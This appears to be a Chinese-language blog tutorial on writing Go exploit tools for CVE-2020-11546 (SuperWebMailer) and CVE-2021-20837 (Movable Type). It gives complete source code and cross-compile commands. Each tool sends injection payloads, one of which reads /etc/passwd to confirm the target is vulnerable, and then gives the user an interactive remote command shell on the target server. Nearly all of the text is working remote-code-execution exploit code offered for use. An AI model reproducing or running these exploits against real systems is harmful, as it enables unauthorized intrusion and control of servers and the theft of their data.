CVE-2020-11546

[!NOTE]

已上传至GitHub:https://github.com/damit5/CVE-2020-11546

扩展1:交叉编译

  1. CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build -ldflags="-s -w" -trimpath -o release/superwebmailerRCE_darwin
  2. CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" -trimpath -o release/superwebmailerRCE_linux
  3. CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" -trimpath -o release/superwebmailerRCE_win.exe

扩展2:go.mod

  1. go mod init <仓库地址>
  2. go mod init github.com/damit5/CVE-2020-11546

不然不能go get -u自动下载编译,会出现问题

扩展3:go get

直接使用go get -u github.com/xxx可能出现版本的问题,可以使用如下命令执行版本或者分支

  1. go get -u -v github.com/damit5/CVE-2020-11546@master

[!TIP]

也可以使用@commit hash等等

扩展4:交互输入

  1. for {
  2. fmt.Printf("\n\ncommand: ")
  3. _, _ = fmt.Scanln(&command)
  4. if command != "" {
  5. break
  6. }
  7. }

代码

  1. package main
  2. import (
  3. "bytes"
  4. "fmt"
  5. "io/ioutil"
  6. "net/http"
  7. "os"
  8. "strings"
  9. )
  10. func banner(){
  11. fmt.Println(`
  12. .___ _____ ____ __
  13. __| _// | | _____/_ |/ |_ ______
  14. / __ |/ | |_/ \| \ __\/ ___/
  15. / /_/ / ^ / Y Y \ || | \___ \
  16. \____ \____ ||__|_| /___||__| /____ >
  17. \/ |__| \/ \/
  18. CVE-2020-11546
  19. `)
  20. }
  21. /* *
  22. 参数检查
  23. */
  24. func argsCheck(args []string) {
  25. if len(args) != 2 {
  26. fmt.Printf("Usage:\n\t./%s <target>\n", args[0])
  27. os.Exit(0)
  28. }
  29. }
  30. /* *
  31. url处理
  32. */
  33. func urlHandler(target string) string {
  34. // 没有http前缀的添加http前缀
  35. if !strings.HasPrefix(target, "http") {
  36. target = "http://" + target
  37. }
  38. // 有/结尾的就去掉/
  39. if strings.HasSuffix(target, "/") { // 去掉后缀 /
  40. target = strings.TrimSuffix(target, "/")
  41. fmt.Println(target)
  42. }
  43. return target
  44. }
  45. /* *
  46. 漏洞检查
  47. */
  48. func check(target string) bool {
  49. // 创建请求
  50. vulurl := target + "/mailingupgrade.php"
  51. req, _ := http.NewRequest("POST", vulurl, bytes.NewReader([]byte(`step=4&Language=de%7b$%7bsystem(%22echo vultest%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E`)))
  52. req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0")
  53. req.Header.Set("Content-type", "application/x-www-form-urlencoded")
  54. // 发起请求
  55. client := http.Client{}
  56. resp, _ := client.Do(req)
  57. body, _ := ioutil.ReadAll(resp.Body)
  58. if strings.Contains(string(body), "vultest") {
  59. return true
  60. }
  61. return false
  62. }
  63. /* *
  64. 漏洞检查
  65. */
  66. func exp(target string, command string) {
  67. // 创建请求
  68. vulurl := target + "/mailingupgrade.php"
  69. data := `step=4&Language=de%7b$%7bsystem(%22` + command + `%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E`
  70. req, _ := http.NewRequest("POST", vulurl, bytes.NewReader([]byte(data)))
  71. req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0")
  72. req.Header.Set("Content-type", "application/x-www-form-urlencoded")
  73. // 发起请求
  74. client := http.Client{}
  75. resp, _ := client.Do(req)
  76. body, _ := ioutil.ReadAll(resp.Body)
  77. res := strings.Replace(string(body), "Can't load correct language file in /language directory", "", -1)
  78. res = strings.TrimSpace(res)
  79. fmt.Println(res)
  80. }
  81. func main() {
  82. args := os.Args
  83. banner()
  84. argsCheck(args)
  85. target := args[1]
  86. target = urlHandler(target)
  87. if check(target) {
  88. fmt.Printf("target %s is vuln", target)
  89. var command string
  90. for {
  91. for {
  92. fmt.Printf("\n\ncommand: ")
  93. fmt.Scanln(&command)
  94. if command != "" {
  95. break
  96. }
  97. }
  98. exp(target, command)
  99. }
  100. } else {
  101. fmt.Printf("target %s is not vuln", target)
  102. }
  103. }

image-20211229173338536

测试图

image-20211229152446871

CVE-2021-20837

扩展5:忽略SSL证书

[!WARNING]

这个错误不容易发现,所以需要经验来判断,在初始化客户端的时候需要忽略SSL证书

  1. var Client http.Client
  2. tr := &http.Transport{
  3. TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, // 忽略SSL证书
  4. }
  5. Client = http.Client{
  6. Transport: tr,
  7. }

扩展6:正则表达式

默认情况下,.是不能匹配换行符\n的,有时候我们有需要通过.匹配到\n,这个时候就需要稍微修改一下.

[!TIP]

在线正则表达式测试网站:https://regex101.com/

  1. (?s).*

实例:
image-20211229171038928

代码

  1. package main
  2. import (
  3. "bytes"
  4. "crypto/tls"
  5. "encoding/base64"
  6. "fmt"
  7. "io/ioutil"
  8. "net/http"
  9. "os"
  10. "regexp"
  11. "strings"
  12. )
  13. // 客户端全局变量
  14. var Client http.Client
  15. func banner(){
  16. fmt.Println(`
  17. .___ _____ ____ __
  18. __| _// | | _____/_ |/ |_ ______
  19. / __ |/ | |_/ \| \ __\/ ___/
  20. / /_/ / ^ / Y Y \ || | \___ \
  21. \____ \____ ||__|_| /___||__| /____ >
  22. \/ |__| \/ \/
  23. CVE-2021-20837
  24. `)
  25. }
  26. /* *
  27. 参数检查
  28. */
  29. func argsCheck(args []string) {
  30. if len(args) != 2 {
  31. fmt.Printf("Usage:\n\t./%s <target>\n", args[0])
  32. os.Exit(0)
  33. }
  34. }
  35. /* *
  36. url处理
  37. */
  38. func urlHandler(target string) string {
  39. // 没有http前缀的添加http前缀
  40. if !strings.HasPrefix(target, "http") {
  41. target = "http://" + target
  42. }
  43. // 有/结尾的就去掉/
  44. if strings.HasSuffix(target, "/") { // 去掉后缀 /
  45. target = strings.TrimSuffix(target, "/")
  46. fmt.Println(target)
  47. }
  48. return target
  49. }
  50. /* *
  51. 漏洞检查
  52. */
  53. func check(target string) bool {
  54. // 创建请求
  55. vulurl := target + "/cgi-bin/mt/mt-xmlrpc.cgi"
  56. command := "`cat /etc/passwd`"
  57. base64_cmd := base64.StdEncoding.EncodeToString([]byte(command))
  58. payload := fmt.Sprintf(`<?xml version="1.0" encoding="UTF-8"?>
  59. <methodCall>
  60. <methodName>mt.handler_to_coderef</methodName>
  61. <params>
  62. <param>
  63. <value>
  64. <base64>
  65. %s
  66. </base64>
  67. </value>
  68. </param>
  69. </params>
  70. </methodCall>`, base64_cmd)
  71. req, _ := http.NewRequest("POST", vulurl, bytes.NewReader([]byte(payload)))
  72. req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0")
  73. req.Header.Set("Content-type", "text/xml; charset=UTF-8")
  74. // 发起请求
  75. tr := &http.Transport{
  76. TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, // 忽略SSL证书
  77. }
  78. Client = http.Client{
  79. Transport: tr,
  80. }
  81. resp, _ := Client.Do(req)
  82. body, _ := ioutil.ReadAll(resp.Body)
  83. if strings.Contains(string(body), "root:x:0") {
  84. return true
  85. }
  86. return false
  87. }
  88. /* *
  89. 漏洞检查
  90. */
  91. func exp(target string, command string) {
  92. // 创建请求
  93. vulurl := target + "/cgi-bin/mt/mt-xmlrpc.cgi"
  94. base64_cmd := base64.StdEncoding.EncodeToString([]byte("`" + command + "`"))
  95. payload := fmt.Sprintf(`<?xml version="1.0" encoding="UTF-8"?>
  96. <methodCall>
  97. <methodName>mt.handler_to_coderef</methodName>
  98. <params>
  99. <param>
  100. <value>
  101. <base64>
  102. %s
  103. </base64>
  104. </value>
  105. </param>
  106. </params>
  107. </methodCall>`, base64_cmd)
  108. req, _ := http.NewRequest("POST", vulurl, bytes.NewReader([]byte(payload)))
  109. req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0")
  110. req.Header.Set("Content-type", "text/xml; charset=UTF-8")
  111. // 发起请求
  112. resp, _ := Client.Do(req)
  113. body, _ := ioutil.ReadAll(resp.Body)
  114. // 正则表达式匹配结果
  115. regex, _ := regexp.Compile("Can't\\slocate\\s((?s).*)\\sin @INC")
  116. res := regex.FindAllStringSubmatch(string(body), 1)[0][1]
  117. fmt.Println(res)
  118. }
  119. func main() {
  120. args := os.Args
  121. banner()
  122. argsCheck(args)
  123. target := args[1]
  124. target = urlHandler(target)
  125. if check(target) {
  126. fmt.Printf("target %s is vuln", target)
  127. var command string
  128. for {
  129. for {
  130. fmt.Printf("\n\ncommand: ")
  131. _, _ = fmt.Scanln(&command)
  132. if command != "" {
  133. break
  134. }
  135. }
  136. exp(target, command)
  137. }
  138. } else {
  139. fmt.Printf("target %s is not vuln", target)
  140. }
  141. }

测试图

image-20211229174210916